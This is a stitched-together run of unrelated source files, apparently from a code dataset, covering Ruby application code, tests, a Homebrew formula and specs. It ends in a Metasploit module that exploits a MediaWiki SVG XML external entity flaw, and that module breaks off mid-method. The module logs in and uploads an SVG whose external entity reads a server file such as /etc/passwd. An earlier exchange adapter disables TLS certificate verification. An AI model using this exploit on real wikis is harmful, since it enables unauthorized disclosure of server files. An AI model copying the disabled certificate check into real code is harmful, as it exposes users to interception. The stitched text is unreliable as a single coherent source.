MiqWorkerType.worker_class_names.each do |class_name|
begin
c = class_name.constantize
raise NameError, "Constant problem: expected: #{class_name}, constantized: #{c.name}" unless c.name == class_name
result[c.name] = c.sync_workers
result[c.name][:adds].each { |pid| worker_add(pid) unless pid.nil? }
rescue => error
_log.error("Failed to sync_workers for class: #{class_name}")
_log.log_backtrace(error)
next
end
end
result
end
def sync_from_system
if podified?
ensure_kube_monitors_started
end
cleanup_orphaned_worker_rows
if podified?
sync_deployment_settings
end
end
def cleanup_orphaned_worker_rows
if podified?
# TODO: Move to a method in the kubernetes namespace
unless current_pods.empty?
orphaned_rows = podified_miq_workers.where.not(:system_uid => current_pods.keys)
unless orphaned_rows.empty?
_log.warn("Removing orphaned worker rows without corresponding pods: #{orphaned_rows.collect(&:system_uid).inspect}")
orphaned_rows.destroy_all
end
end
end
end
def monitor_active_workers
# When k8s or systemd is operating as the worker monitor then all of the
# worker monitoring (liveness, memory threshold) is handled by those
# systems. Only when workers are run as standalone processes does MiqServer
# have to monitor the workers itself.
return if podified? || systemd?
# Monitor all remaining current worker records
miq_workers.where(:status => MiqWorker::STATUSES_CURRENT_OR_STARTING).each do |worker|
# Push the heartbeat into the database
persist_last_heartbeat(worker)
# Check the worker record for heartbeat timeouts
validate_worker(worker)
end
end
def cleanup_failed_workers
check_not_responding
check_pending_stop
clean_worker_records
if podified?
cleanup_failed_deployments
elsif systemd?
cleanup_failed_systemd_services
end
end
def podified?
MiqEnvironment::Command.is_podified?
end
def systemd?
MiqEnvironment::Command.supports_systemd?
end
def clean_worker_records
worker_deleted = false
miq_workers.each do |w|
next unless w.is_stopped?
_log.info("SQL Record for #{w.format_full_log_msg}, Status: [#{w.status}] is being deleted")
worker_delete(w.pid)
w.destroy
worker_deleted = true
end
miq_workers.reload if worker_deleted
end
def check_pending_stop
miq_workers.each do |w|
next unless w.is_stopped?
next unless worker_get_monitor_status(w.pid) == :waiting_for_stop
worker_set_monitor_status(w.pid, nil)
end
end
def check_not_responding
return if MiqEnvironment::Command.is_podified?
worker_deleted = false
miq_workers.each do |w|
next unless monitor_reason_not_responding?(w)
next unless worker_get_monitor_status(w.pid) == :waiting_for_stop
worker_not_responding(w)
worker_delete(w.pid)
w.destroy
worker_deleted = true
end
miq_workers.reload if worker_deleted
end
def monitor_reason_not_responding?(w)
[MiqServer::NOT_RESPONDING, MiqServer::MEMORY_EXCEEDED].include?(worker_get_monitor_reason(w.pid)) || w.stopping_for_too_long?
end
def do_system_limit_exceeded
MiqWorkerType.worker_class_names_in_kill_order.each do |class_name|
workers = class_name.constantize.find_current.to_a
next if workers.empty?
w = workers.sort_by { |w| [w.memory_usage || -1, w.id] }.last
msg = "#{w.format_full_log_msg} is being stopped because system resources exceeded threshold, it will be restarted once memory has freed up"
_log.warn(msg)
notification_options = {
:name => name,
:memory_usage => memory_usage.to_i,
:memory_threshold => memory_threshold,
:pid => pid
}
MiqEvent.raise_evm_event_queue_in_region(w.miq_server, "evm_server_memory_exceeded", :event_details => msg, :type => w.class.name, :full_data => notification_options)
stop_worker(w, MiqServer::MEMORY_EXCEEDED)
break
end
end
def sync_monitor
@last_sync ||= Time.now.utc
sync_interval = @worker_monitor_settings[:sync_interval] || 30.minutes
sync_interval_reached = sync_interval.seconds.ago.utc > @last_sync
roles_changed = self.active_roles_changed?
resync_needed = roles_changed || sync_interval_reached
roles_added, roles_deleted, _roles_unchanged = role_changes
if resync_needed
log_role_changes if roles_changed
sync_active_roles if roles_changed
set_active_role_flags if roles_changed
stop_apache if roles_changed && !apache_needed?
start_apache if roles_changed && apache_needed?
EvmDatabase.restart_failover_monitor_service if (roles_added | roles_deleted).include?("database_operations")
reset_queue_messages if roles_changed
@last_sync = Time.now.utc
notify_workers_of_config_change(@last_sync)
end
end
def key_store
@key_store ||= MiqMemcached.client(:namespace => "server_monitor")
end
def notify_workers_of_config_change(last_sync)
key_store.set("last_config_change", last_sync)
end
end
| 29.794521 | 172 | 0.710192 |
bb54be742c0ec0f806bbe940bd405d24d4bfecb0 | 538 | module PrependedModule
def output
puts "Outputting from the PrependedModule"
super
end
def self.prepended(base_class)
puts "Included: #{base_class}"
base_class.instance_eval do
def self.inherited(klass)
puts "Inherited: #{klass}"
klass.send(:prepend, PrependedModule)
end
end
end
end
class ParentClass
prepend PrependedModule
def output
puts "Outputting from the parent class"
end
end
class ChildClass < ParentClass
def output
puts "Outputting from the child class"
end
end
puts ChildClass.new.output
| 19.214286 | 44 | 0.760223 |
b97a2c4b7218cae5f4e5a202a6c3d540cf8a5adf | 1,817 | module Cryptoexchange::Exchanges
module Lukki
module Services
class OrderBook < Cryptoexchange::Services::Market
class << self
def supports_individual_ticker_query?
true
end
end
def fetch(market_pair)
ctx = OpenSSL::SSL::SSLContext.new
ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
output = Cryptoexchange::Cache.ticker_cache.fetch(ticker_url(market_pair)) do
HTTP.get(ticker_url(market_pair), ssl_context: ctx).parse(:json)
end
adapt(output, market_pair)
end
def ticker_url(market_pair)
"#{Cryptoexchange::Exchanges::Lukki::Market::API_URL}/trading/books?page=1&ticker=#{market_pair.base.downcase}_#{market_pair.target.downcase}"
end
def adapt(output, market_pair)
order_book = Cryptoexchange::Models::OrderBook.new
asks = output["data"].map { |n| n if n["direction"] == 1 }.compact
bids = output["data"].map { |n| n if n["direction"] == 0 }.compact
order_book.base = market_pair.base
order_book.target = market_pair.target
order_book.market = Lukki::Market::NAME
order_book.asks = asks.nil? ? nil : adapt_orders(asks)
order_book.bids = bids.nil? ? nil : adapt_orders(bids)
order_book.timestamp = nil
order_book.payload = output
order_book
end
def adapt_orders(orders)
orders.collect do |order_entry|
Cryptoexchange::Models::Order.new(price: order_entry["price"].to_f,
amount: order_entry["amount"].to_f,
timestamp: nil)
end
end
end
end
end
end
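# Hypothetical fetch (the MarketPair construction below mirrors other cryptoexchange
# adapters and is an assumption, not something defined in this file):
#
#   pair = Cryptoexchange::Models::MarketPair.new(base: 'BTC', target: 'USDT', market: 'lukki')
#   Cryptoexchange::Exchanges::Lukki::Services::OrderBook.new.fetch(pair)
#   # => Cryptoexchange::Models::OrderBook with #asks / #bids arrays of Order objects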
| 34.283019 | 152 | 0.576225 |
08e13eef03b154e6e4481ac29908a0ff89e70d34 | 741 | ResendCancelInvitationMutation = GraphQL::Relay::Mutation.define do
name 'ResendCancelInvitation'
input_field :email, !types.String
input_field :action, !types.String
return_field :success, types.Boolean
return_field :team, TeamType
resolve -> (_root, inputs, _ctx) {
user = User.find_user_by_email(inputs[:email])
if user.nil?
raise ActiveRecord::RecordNotFound
else
case inputs[:action]
when 'cancel'
User.cancel_user_invitation(user)
when 'resend'
tu = user.team_users.where(team_id: Team.current.id).last
tu.update_columns(created_at: Time.now)
user.send_invitation_mail(tu.reload)
end
{ success: true, team: Team.current }
end
}
end
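# Hypothetical client-side call (field and argument casing follow graphql-ruby's Relay
# mutation conventions and are assumptions, not taken from this schema):
#
#   mutation {
#     resendCancelInvitation(input: { email: "user@example.com", action: "resend" }) {
#       success
#     }
#   }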
| 25.551724 | 67 | 0.68556 |
f8cca56d0e59e26ed08d6af3f9df90e919f91739 | 1,607 | module RiksbankCurrency
# Get the latest rates that will be correct for the current day.
#
# @see https://swea.riksbank.se/sweaWS/docs/api/call/getLatestInterestAndExchangeRates.htm
class TodayFetcher
def rate_date
@rate_date ||=
begin
response.xpath("//resultrows/date").map do |date_node|
Helper.parse_date(date_node.content)
end.max
end
end
def to_hash
rates = {}
response.xpath("//series").each do |series|
currency = Helper.currency_from_seriesid(series.at_xpath('seriesid').content)
if (rate = series.at_xpath('resultrows/value').content).length > 0
unit = BigDecimal(series.at_xpath('unit').content)
rate = BigDecimal(rate)
rates[currency] = rate / unit
else
next
end
end
rates
end
def response
@response ||= Request.call(xml_template, 'getLatestInterestAndExchangeRates')
end
protected
def series
RiksbankCurrency.currencies.map do |currency|
id = Helper.currency_to_seriesid(currency)
"<seriesid>#{id}</seriesid>"
end.join('')
end
def xml_template
<<-XML
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:xsd="http://swea.riksbank.se/xsd">
<soap:Header/>
<soap:Body>
<xsd:getLatestInterestAndExchangeRates>
<languageid>en</languageid>
#{series}
</xsd:getLatestInterestAndExchangeRates>
</soap:Body>
</soap:Envelope>
XML
end
end
end
| 25.919355 | 114 | 0.611077 |
28cee3a1254cc4da3bcb1b44b5231a3fdb7fd678 | 3,073 | # frozen_string_literal: true
require 'test_helper'
class MyForm
include NewApplicationForm
def initialize(provider:, service_plans_management_visible:)
@provider = provider
@user = FactoryBot.create(:simple_user, account: @provider)
@service_plans_management_visible = service_plans_management_visible
end
attr_reader :provider, :user
def service_plans_management_visible?
@service_plans_management_visible
end
end
module Concerns
class NewApplicationFormTest < ActiveSupport::TestCase
include ActiveJob::TestHelper
def setup(**opts)
@provider = FactoryBot.create(:simple_provider)
@form = MyForm.new(provider: @provider, **opts)
end
attr_reader :provider, :form
delegate :new_application_form_base_data,
:buyers,
:products,
:application_defined_fields_data, to: :form
class WithServicePlansManagementVisible < NewApplicationFormTest
def setup
super(service_plans_management_visible: true)
end
end
class WithoutServicePlansManagementVisible < NewApplicationFormTest
def setup
super(service_plans_management_visible: false)
end
end
test "new_application_form_base_data" do
form_data = new_application_form_base_data(provider)
expected_keys = %i[create-application-plan-path create-service-plan-path service-subscriptions-path service-plans-allowed defined-fields]
unexpected_keys = %i[most-recently-updated-products products-count buyer errors product most-recently-created-buyers buyers-count]
assert_same_elements expected_keys, form_data.keys
unexpected_keys.each { |key| assert_does_not_contain form_data.keys, key }
end
test "new_application_form_base_data with application" do
application = FactoryBot.create(:cinstance)
form_data = new_application_form_base_data(provider, application)
expected_keys = %i[create-application-plan-path create-service-plan-path service-subscriptions-path service-plans-allowed defined-fields errors]
unexpected_keys = %i[most-recently-updated-products products-count buyer product most-recently-created-buyers buyers-count]
assert_same_elements expected_keys, form_data.keys
unexpected_keys.each { |key| assert_does_not_contain form_data.keys, key }
end
test "buyers are limited to 20" do
FactoryBot.create_list(:simple_buyer, 21, provider_account: provider)
assert_equal 20, buyers.size
end
test "products are limited to 20" do
FactoryBot.create_list(:simple_service, 21, account: provider)
assert_equal 20, products.size
end
test "application_defined_fields_data" do
field = FactoryBot.create(:fields_definition, account: provider, target: 'Cinstance')
data = application_defined_fields_data(provider)
assert_equal 1, data.size
assert_equal "cinstance[#{field.name}]", data.first[:name]
end
def self.runnable_methods
Concerns::NewApplicationFormTest == self ? [] : super
end
end
end
| 32.691489 | 150 | 0.743573 |
e28c3fe135ce456116db21166e537749a3c4eafb | 1,332 | class Emqx < Formula
homepage "https://emqx.io"
url "https://repos.emqx.io/emqx-ce/homebrew/emqx-homebrew-4.3.5.zip"
sha256 "019e1a2a704caa6a878c46d4e3a1a5241f1cbd34d236f78de8db5a9f0460e480"
version "4.3.5"
depends_on "openssl"
def install
prefix.install Dir["*"]
bin.install Dir[libexec/"/bin/emqx"]
rm %W[#{bin}/emqx.cmd #{bin}/emqx_ctl.cmd]
end
plist_options :manual => "emqx"
def plist; <<-EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>Program</key>
<string>#{opt_bin}/emqx</string>
<key>RunAtLoad</key>
<true/>
<key>EnvironmentVariables</key>
<dict>
<!-- need erl in the path -->
<key>PATH</key>
<string>#{HOMEBREW_PREFIX}/sbin:/usr/bin:/bin:#{HOMEBREW_PREFIX}/bin</string>
<key>CONF_ENV_FILE</key>
        <string>#{etc}/emqx.conf</string>
</dict>
</dict>
</plist>
EOS
end
def post_install
system "mkdir", "-p", "#{prefix}/data/configs"
end
test do
system emqx, "start"
system emqx_ctl, "status"
system emqx, "stop"
end
end
| 25.615385 | 87 | 0.594595 |
0108cd77e878994b8d1d174a3d172822b81af6f0 | 332 | class Appcleaner < Cask
version '2.2.3'
sha256 '90b3d8e3c32388035e5154594222d66d48d5cad263a5387f77f9ea77315af84d'
url "http://www.freemacsoft.net/downloads/AppCleaner_#{version}.zip"
appcast 'http://www.freemacsoft.net/appcleaner/Updates.xml'
homepage 'http://www.freemacsoft.net/appcleaner/'
app 'AppCleaner.app'
end
| 30.181818 | 75 | 0.78012 |
2139f912c417d0e054984397f5947f87db8bcc88 | 962 | require 'rom/support/class_builder'
describe ROM::ClassBuilder do
subject(:builder) { ROM::ClassBuilder.new(options) }
let(:klass) { builder.call }
describe '#call' do
let(:options) do
{ name: 'Test', parent: parent }
end
let(:parent) { Class.new }
it 'returns a class constant' do
expect(klass).to be_instance_of(Class)
end
it 'sets class name based on provided :name option' do
expect(klass.name).to eql(options[:name])
end
it 'uses a parent class provided by :parent option' do
expect(klass).to be < parent
end
it 'defines to_s and inspect' do
expect(klass.to_s).to eql(options[:name])
expect(klass.inspect).to eql(options[:name])
end
it 'yields created class' do
klass = builder.call { |yielded_class|
yielded_class.class_eval do
def self.testing; end
end
}
expect(klass).to respond_to(:testing)
end
end
end
| 22.372093 | 58 | 0.633056 |
e284f05875976452c7ecf3f25bafee5018ea32cf | 6,008 | # A container item is something that has been "localized to" a container.
# We can't say that it is "in" the container, because not all containers (e.g. a pin with three specimens) contain the object.
# By "localized to" we mean that if you can find the container, then its contents should also be locatable.
#
# This concept is a graph edge defining the relationship to the container.
#
# @!attribute parent_id
# @return [Integer]
# id of the ContainerItem whose contained_object is a Container, i.e. the container of this ContainerItem
#
# @!attribute contained_object_id
# @return [Integer]
# the id of the object that is contained (Rails polymorphic)
#
# @!attribute contained_object_type
# @return [String]
# the type of the object that is contained (Rails polymorphic)
#
# @!attribute localization
# @return [String]
# some additional modifier arbitrarily defining the position of this item, aka disposition, always relative to enclosing container
#
# @!attribute project_id
# @return [Integers
# the project ID
#
## @!attribute disposition_x
# @return [Integer]
# a x coordinate for this item in its container
#
## @!attribute disposition_y
# @return [Integer]
# a y coordinate for this item in its container
#
## @!attribute disposition_z
# @return [Integer]
# a z coordinate for this item in its container
#
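# @example A rough sketch of localizing an object to a container (the Container::Pin and
#   Specimen classes plus the factory data are assumptions for illustration only):
#
#   pin      = Container::Pin.create!
#   specimen = Specimen.create!
#   ContainerItem.create!(contained_object: specimen,
#                         container_id:     pin.id,
#                         disposition_x:    1)
#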
class ContainerItem < ApplicationRecord
# @return class
# this method calls Module#module_parent
# TODO: This method can be placed elsewhere inside this class (or even removed if not used)
# when https://github.com/ClosureTree/closure_tree/issues/346 is fixed.
def self.parent
self.module_parent
end
has_closure_tree
include Housekeeping
include Shared::IsData
attr_accessor :global_entity
attr_accessor :container_id
belongs_to :contained_object, polymorphic: true
# !! this will prevent accepts_nested assignments if we add this
validates_presence_of :contained_object_id
validate :parent_contained_object_is_container
validate :contained_object_is_container_when_parent_id_is_blank
validate :contained_object_is_unique
validate :object_fits_in_container
validate :position_is_not_replicated
validate :parent_is_provided_if_object_is_not_container
scope :containers, -> { where(contained_object_type: 'Container') }
scope :not_containers, -> { where.not(contained_object_type: 'Container') }
scope :containing_collection_objects, -> {where(contained_object_type: 'CollectionObject')}
# before_save :set_container, unless: Proc.new {|n| n.container_id.nil? || errors.any? }
# @params object [Container]
def container=(object)
if object.metamorphosize.kind_of?(Container)
if self.parent
self.parent.contained_object = object
else
# This self required?!
self.parent = ContainerItem.new(contained_object: object)
end
self.parent.save! if !self.parent.new_record?
save! unless new_record?
end
end
# @param value [a Container#id]
def container_id=(value)
@container_id = value
set_container
end
# @return [Container, nil]
# the immediate container for this ContainerItem
def container
parent.try(:contained_object)
end
# TODO: this is silly, type should be the same
# @return [GlobalID]
# ! not a string
def global_entity
contained_object.to_global_id if contained_object.present?
end
# @params entity [String, a global id]
def global_entity=(entity)
self.contained_object = GlobalID::Locator.locate(entity)
end
protected
def set_container
c = Container.find(container_id)
# Already in some container
if parent && parent.persisted?
self.parent.update_columns(contained_object_type: 'Container', contained_object_id: c.id)
# Not in container
else
# In same container as something else
if d = c.container_item
self.parent = d
# In a new container
else
self.parent = ContainerItem.create!(contained_object: c)
end
end
# self.parent.save! if !self.parent.new_record?
# save! unless new_record?
end
def object_fits_in_container
if parent
%w{x y z}.each do |coord|
c = send("disposition_#{coord}")
errors.add("disposition_#{coord}".to_sym, 'is larger than the container size') if c && parent.contained_object.send("size_#{coord}") < c
end
end
end
def position_is_not_replicated
if parent && (disposition_x || disposition_y || disposition_z)
if ContainerItem.where.not(id: id).
where(parent: parent,
disposition_x: disposition_x,
disposition_y: disposition_y,
disposition_z: disposition_z ).count > 0
errors.add(:base, 'position is already taken in this container')
end
end
end
# If the contained_object is a CollectionObject, it must have a parent container reference
def contained_object_is_container_when_parent_id_is_blank
if parent_id.blank? && container_id.blank? && container.blank?
errors.add(:parent_id, 'can only be blank if object is a container') if contained_object_type != 'Container'
end
end
# parent_id links an object to a container through container_item
def parent_contained_object_is_container
unless parent_id.blank? && parent.nil?
errors.add(:parent_id, "can only be set if parent's contained object is a container") if parent.contained_object_type != 'Container'
end
end
def parent_is_provided_if_object_is_not_container
if !(contained_object_type =~ /Container/) && !parent
errors.add(:parent, "must be set if contained object is not a container")
end
end
def contained_object_is_unique
if ContainerItem.where.not(id: id).where(project_id: project_id, contained_object_id: contained_object_id, contained_object_type: contained_object_type).count > 0
errors.add(:contained_object, 'is already in a container_item')
end
end
end
| 32.475676 | 166 | 0.721039 |
f715266cb6b476f9705aca0088c71ff28a8bd6d4 | 681 | require 'spec_helper_acceptance'
describe 'pe_databases class' do
context 'activates module default parameters' do
it 'applies the class with default parameters' do
pp = <<-MANIFEST
include pe_databases
MANIFEST
# Run it twice and test for idempotency
idempotent_apply(pp)
end
end
describe 'check pe_databases script directory' do
it 'scripts folder exists' do
expect(file('/opt/puppetlabs/pe_databases/scripts')).to be_directory
end
end
describe 'check systemd fact' do
it 'is true on all supported OS' do
expect(host_inventory['facter']['pe_databases']['have_systemd']).to eq true
end
end
end
| 25.222222 | 81 | 0.697504 |
38f4ade29eed179275e6bc9c1d9bc09df5fbb4cd | 1,086 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2018_09_24_001419) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "time_samples", force: :cascade do |t|
t.string "location"
t.integer "value"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
end
| 41.769231 | 86 | 0.771639 |
1c6ee2eacdd6cca1e7566c5014cd504be95fc60c | 5,967 | # encoding: utf-8
require "test_utils"
require "logstash/filters/mutate"
describe LogStash::Filters::Mutate do
extend LogStash::RSpec
describe "basics" do
config <<-CONFIG
filter {
mutate {
lowercase => "lowerme"
uppercase => "upperme"
convert => [ "intme", "integer", "floatme", "float" ]
rename => [ "rename1", "rename2" ]
replace => [ "replaceme", "hello world" ]
replace => [ "newfield", "newnew" ]
update => [ "nosuchfield", "weee" ]
update => [ "updateme", "updated" ]
remove => [ "removeme" ]
}
}
CONFIG
event = {
"lowerme" => [ "ExAmPlE" ],
"upperme" => [ "ExAmPlE" ],
"intme" => [ "1234", "7890.4", "7.9" ],
"floatme" => [ "1234.455" ],
"rename1" => [ "hello world" ],
"updateme" => [ "who cares" ],
"replaceme" => [ "who cares" ],
"removeme" => [ "something" ]
}
sample event do
insist { subject["lowerme"] } == ['example']
insist { subject["upperme"] } == ['EXAMPLE']
insist { subject["intme"] } == [1234, 7890, 7]
insist { subject["floatme"] } == [1234.455]
reject { subject }.include?("rename1")
insist { subject["rename2"] } == [ "hello world" ]
reject { subject }.include?("removeme")
insist { subject }.include?("newfield")
insist { subject["newfield"] } == "newnew"
reject { subject }.include?("nosuchfield")
insist { subject["updateme"] } == "updated"
end
end
describe "remove multiple fields" do
config '
filter {
mutate {
remove => [ "remove-me", "remove-me2", "diedie", "[one][two]" ]
}
}'
sample(
"remove-me" => "Goodbye!",
"remove-me2" => 1234,
"diedie" => [1, 2, 3, 4],
"survivor" => "Hello.",
"one" => { "two" => "wee" }
) do
insist { subject["survivor"] } == "Hello."
reject { subject }.include?("remove-me")
reject { subject }.include?("remove-me2")
reject { subject }.include?("diedie")
reject { subject["one"] }.include?("two")
end
end
describe "convert one field to string" do
config '
filter {
mutate {
convert => [ "unicorns", "string" ]
}
}'
sample("unicorns" => 1234) do
insist { subject["unicorns"] } == "1234"
end
end
describe "gsub on a String" do
config '
filter {
mutate {
gsub => [ "unicorns", "but extinct", "and common" ]
}
}'
sample("unicorns" => "Magnificient, but extinct, animals") do
insist { subject["unicorns"] } == "Magnificient, and common, animals"
end
end
describe "gsub on an Array of Strings" do
config '
filter {
mutate {
gsub => [ "unicorns", "extinct", "common" ]
}
}'
sample("unicorns" => [
"Magnificient extinct animals", "Other extinct ideas" ]
) do
insist { subject["unicorns"] } == [
"Magnificient common animals",
"Other common ideas"
]
end
end
describe "gsub on multiple fields" do
config '
filter {
mutate {
gsub => [ "colors", "red", "blue",
"shapes", "square", "circle" ]
}
}'
sample("colors" => "One red car", "shapes" => "Four red squares") do
insist { subject["colors"] } == "One blue car"
insist { subject["shapes"] } == "Four red circles"
end
end
describe "regression - mutate should lowercase a field created by grok" do
config <<-CONFIG
filter {
grok {
match => { "message" => "%{WORD:foo}" }
}
mutate {
lowercase => "foo"
}
}
CONFIG
sample "HELLO WORLD" do
insist { subject["foo"] } == "hello"
end
end
describe "LOGSTASH-757: rename should do nothing with a missing field" do
config <<-CONFIG
filter {
mutate {
rename => [ "nosuchfield", "hello" ]
}
}
CONFIG
sample "whatever" do
reject { subject }.include?("nosuchfield")
reject { subject }.include?("hello")
end
end
describe "convert should work on nested fields" do
config <<-CONFIG
filter {
mutate {
convert => [ "[foo][bar]", "integer" ]
}
}
CONFIG
sample({ "foo" => { "bar" => "1000" } }) do
insist { subject["[foo][bar]"] } == 1000
insist { subject["[foo][bar]"] }.is_a?(Fixnum)
end
end
#LOGSTASH-1529
describe "gsub on a String with dynamic fields (%{}) in pattern" do
config '
filter {
mutate {
gsub => [ "unicorns", "of type %{unicorn_type}", "green" ]
}
}'
sample("unicorns" => "Unicorns of type blue are common", "unicorn_type" => "blue") do
insist { subject["unicorns"] } == "Unicorns green are common"
end
end
#LOGSTASH-1529
describe "gsub on a String with dynamic fields (%{}) in pattern and replace" do
config '
filter {
mutate {
gsub => [ "unicorns2", "of type %{unicorn_color}", "%{unicorn_color} and green" ]
}
}'
sample("unicorns2" => "Unicorns of type blue are common", "unicorn_color" => "blue") do
insist { subject["unicorns2"] } == "Unicorns blue and green are common"
end
end
#LOGSTASH-1529
describe "gsub on a String array with dynamic fields in pattern" do
config '
filter {
mutate {
gsub => [ "unicorns_array", "of type %{color}", "blue and green" ]
}
}'
sample("unicorns_array" => [
"Unicorns of type blue are found in Alaska", "Unicorns of type blue are extinct" ],
"color" => "blue"
) do
insist { subject["unicorns_array"] } == [
"Unicorns blue and green are found in Alaska",
"Unicorns blue and green are extinct"
]
end
end
end
| 25.831169 | 91 | 0.52053 |
87043bb91f5a0121b11b61ce928df00b6a422859 | 1,370 | # frozen_string_literal: true
require 'optparse'
require 'cadenza/cli/options'
require 'multi_json'
module Cadenza
# The code for the command line interface is defined here
module Cli
module_function
def run!(path, options = {})
# set up the load paths
if options[:root]
load_paths.push(options[:root])
elsif options.fetch(:load_paths, []).any?
load_paths.concat(options[:load_paths])
else
load_paths.push(Dir.pwd)
end
# add load paths to the context
load_paths.each do |load_path|
context.add_load_path load_path
end
# based on the action, perform whatever the user has asked
send(options[:action], path, options)
end
def tokenize(path, _options)
lexer = Cadenza::Lexer.new
lexer.source = context.load_source!(path)
$stdout.puts lexer.remaining_tokens.map(&:inspect).join("\n")
end
def parse(path, _options)
$stdout.puts context.load_template!(path).to_tree
end
def render(path, options)
Cadenza.render_template path, options[:context], context: context
end
private
def load_paths
@load_paths ||= []
end
def context
@context ||= begin
context = Cadenza::BaseContext.new
context.whiny_template_loading = true
context
end
end
end
end
| 22.833333 | 71 | 0.645985 |
5d08288810665ff74cd226211caa004f722146a7 | 9,900 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'MediaWiki SVG XML Entity Expansion Remote File Access',
'Description' => %q{
This module attempts to read a remote file from the server using a vulnerability
in the way MediaWiki handles SVG files. The vulnerability occurs while trying to
expand external entities with the SYSTEM identifier. In order to work MediaWiki must
be configured to accept upload of SVG files. If anonymous uploads are allowed the
username and password aren't required, otherwise they are. This module has been
tested successfully on MediaWiki 1.19.4, 1.20.3 on Ubuntu 10.04 and Ubuntu 12.10.
Older versions were also tested but do not seem to be vulnerable to this vulnerability.
The following MediaWiki requirements must be met: File upload must be enabled,
$wgFileExtensions[] must include 'svg', $wgSVGConverter must be set to something
other than 'false'.
},
'References' =>
[
[ 'OSVDB', '92490' ],
[ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=46859' ],
[ 'URL', 'http://www.gossamer-threads.com/lists/wiki/mediawiki-announce/350229']
],
'Author' =>
[
'Daniel Franke', # Vulnerability discovery and PoC
'juan vazquez', # Metasploit module
'Christian Mehlmauer' # Metasploit module
],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [true, 'Path to MediaWiki', '/mediawiki']),
OptString.new('RFILE', [true, 'Remote File', '/etc/passwd']),
OptString.new('USERNAME', [ false, "The user to authenticate as"]),
OptString.new('PASSWORD', [ false, "The password to authenticate with" ])
], self.class)
register_autofilter_ports([ 80 ])
deregister_options('RHOST')
end
def rport
datastore['RPORT']
end
def peer(rhost)
"#{rhost}:#{rport}"
end
def get_first_session
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "index.php"),
'method' => 'GET',
'vars_get' => {
"title" => "Special:UserLogin",
"returnto" => "Main+Page"
}
})
if res and res.code == 200 and res.headers['Set-Cookie'] and res.headers['Set-Cookie'] =~ /([^\s]*session)=([a-z0-9]+)/
return $1,$2
else
return nil
end
end
def get_login_token
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "index.php"),
'method' => 'GET',
'vars_get' => {
"title" => "Special:UserLogin",
"returnto" => "Main+Page"
},
'cookie' => session_cookie
})
if res and res.code == 200 and res.body =~ /name="wpLoginToken" value="([a-f0-9]*)"/
return $1
else
return nil
end
end
def parse_auth_cookie(cookies)
cookies.split(";").each do |part|
case part
when /([^\s]*UserID)=(.*)/
@wiki_user_id_name = $1
@wiki_user_id = $2
when /([^\s]*UserName)=(.*)/
@wiki_user_name_name = $1
@wiki_user_name = $2
when /session=(.*)/
@wiki_session = $1
else
next
end
end
end
def session_cookie
if @user and @password
return "#{@wiki_session_name}=#{@wiki_session}; #{@wiki_user_id_name}=#{@wiki_user_id}; #{@wiki_user_name_name}=#{@wiki_user_name}"
else
return "#{@wiki_session_name}=#{@wiki_session}"
end
end
def authenticate
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "index.php"),
'method' => 'POST',
'vars_get' => {
"title" => "Special:UserLogin",
"action" => "submitlogin",
"type" => "login"
},
'vars_post' => {
"wpName" => datastore['USERNAME'],
"wpPassword" => datastore['PASSWORD'],
"wpLoginAttempt" => "Log+in",
"wpLoginToken" => @login_token,
"returnto" => "Main+Page"
},
'cookie' => session_cookie
})
if res and res.code == 302 and res.headers['Set-Cookie'] =~ /UserID=/
parse_auth_cookie(res.headers['Set-Cookie'])
return true
else
return false
end
end
def get_edit_token
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "index.php", "Special:Upload"),
'method' => 'GET',
'cookie' => session_cookie
})
if res and res.code == 200 and res.body =~/<title>Upload file/ and res.body =~ /<input id="wpEditToken" type="hidden" value="([0-9a-f]*)\+\\" name="wpEditToken" \/>/
return $1
else
return nil
end
end
def upload_file
entity = Rex::Text.rand_text_alpha_lower(3)
@file_name = Rex::Text.rand_text_alpha_lower(4)
svg_file = %Q|
<!DOCTYPE svg [<!ENTITY #{entity} SYSTEM "file://#{datastore['RFILE']}">]>
<svg xmlns="http://www.w3.org/2000/svg" version="1.1">
<desc>&#{entity};</desc>
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:1;stroke:rgb(0,0,0)" />
</svg>
|
svg_file.gsub!(/\t\t/, "")
post_data = Rex::MIME::Message.new
post_data.add_part(svg_file, "image/svg+xml", nil, "form-data; name=\"wpUploadFile\"; filename=\"#{@file_name}.svg\"")
post_data.add_part("#{@file_name.capitalize}.svg", nil, nil, "form-data; name=\"wpDestFile\"")
post_data.add_part("", nil, nil, "form-data; name=\"wpUploadDescription\"")
post_data.add_part("", nil, nil, "form-data; name=\"wpLicense\"")
post_data.add_part("#{@edit_token}+\\", nil, nil, "form-data; name=\"wpEditToken\"")
post_data.add_part("Special:Upload", nil, nil, "form-data; name=\"title\"")
post_data.add_part("1", nil, nil, "form-data; name=\"wpDestFileWarningAck\"")
post_data.add_part("Upload file", nil, nil, "form-data; name=\"wpUpload\"")
# Work around an incompatible MIME implementation
data = post_data.to_s
